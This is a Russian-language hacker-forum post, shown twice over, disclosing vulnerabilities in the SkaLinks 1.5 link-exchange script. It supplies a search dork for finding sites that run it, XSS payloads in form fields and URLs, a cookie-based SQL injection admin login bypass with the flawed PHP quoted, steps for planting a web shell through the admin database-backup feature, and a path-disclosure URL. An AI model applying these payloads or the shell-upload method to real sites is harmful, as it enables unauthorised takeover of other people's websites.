Dimi4
29.01.2009, 21:55
Уязвимости SkaLinks - Link Exchange Script
Product : SkaLinks
Version : 1.5
Dork : Powered by SkaLinks
Site: http://www.skalinks.com/
Founded by: Dimi4
Date : 29.01.09
Cross Site Scripting
/vuln/skalinks_1_5/add_url.php
Уязвимая переменная: link_url
Пример запроса:
POST /vuln/skalinks_1_5/add_url.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1
User-Agent: Mozilla/4.0
Content-Length: 288
Connection: Close
link_url="><script>alert()</script>&link_title=test&link_description=test&link_full_description=testtest&link_email=mail@address.com&cat=1&Form_submitted=Submit%20Link&letter_id=4
Уязвимая переменная: link_full_description,link_description
link_full_description=</textarea><script>alert()</script>
SQL-injection, Bypass
Обход авторизации в админке
Бажная функция:
function IsAdmin( )
{
$table_name = $this->m_AdminsTable;
$res = $this->db_Row( "SELECT * FROM `$table_name` WHERE `Name`='".$_COOKIE['adminname']."' AND `Password`='".$_COOKIE['pwd']."'");
if ( !$res )
{
return 0;
}
else
{
return $res;
}
}
http://127.0.0.1/VULN/skalinks_1_5/admin/
Admin name : 1' OR 1=1/*
Cross Site Scripting in URI
http://127.0.0.1/vuln/skalinks_1_5/admin/index.php/>"><script>alert()</script>
http://127.0.0.1//vuln/skalinks_1_5/admin/register.php/>"><script>alert()</script>
http://127.0.0.1/vuln/skalinks_1_5/vuln/skalinks_1_5/search.php/>"><script>alert()</script>
Способ заливки шелла
Такой слособ прокатит только если криво выставлены права. Вообщем после удачного обхода авторизации, через дамп льем файл .htaccess. Содержимое:
allow from all
. Ясен пень, при кривых правах файл перезапишется. Далее спокойно, через тот же бекап спокойно льем шелл (/admin/db_backup).
Раскрытие путей
http://127.0.0.1/vuln/skalinks_1_5/search.php?url=test&Search=Search&search_type=URL
Product : SkaLinks
Version : 1.5
Dork : Powered by SkaLinks
Site: http://www.skalinks.com/
Founded by: Dimi4
Date : 29.01.09
Cross Site Scripting
/vuln/skalinks_1_5/add_url.php
Уязвимая переменная: link_url
Пример запроса:
POST /vuln/skalinks_1_5/add_url.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1
User-Agent: Mozilla/4.0
Content-Length: 288
Connection: Close
link_url="><script>alert()</script>&link_title=test&link_description=test&link_full_description=testtest&link_email=mail@address.com&cat=1&Form_submitted=Submit%20Link&letter_id=4
Уязвимая переменная: link_full_description,link_description
link_full_description=</textarea><script>alert()</script>
SQL-injection, Bypass
Обход авторизации в админке
Бажная функция:
function IsAdmin( )
{
$table_name = $this->m_AdminsTable;
$res = $this->db_Row( "SELECT * FROM `$table_name` WHERE `Name`='".$_COOKIE['adminname']."' AND `Password`='".$_COOKIE['pwd']."'");
if ( !$res )
{
return 0;
}
else
{
return $res;
}
}
http://127.0.0.1/VULN/skalinks_1_5/admin/
Admin name : 1' OR 1=1/*
Cross Site Scripting in URI
http://127.0.0.1/vuln/skalinks_1_5/admin/index.php/>"><script>alert()</script>
http://127.0.0.1//vuln/skalinks_1_5/admin/register.php/>"><script>alert()</script>
http://127.0.0.1/vuln/skalinks_1_5/vuln/skalinks_1_5/search.php/>"><script>alert()</script>
Способ заливки шелла
Такой слособ прокатит только если криво выставлены права. Вообщем после удачного обхода авторизации, через дамп льем файл .htaccess. Содержимое:
allow from all
. Ясен пень, при кривых правах файл перезапишется. Далее спокойно, через тот же бекап спокойно льем шелл (/admin/db_backup).
Раскрытие путей
http://127.0.0.1/vuln/skalinks_1_5/search.php?url=test&Search=Search&search_type=URL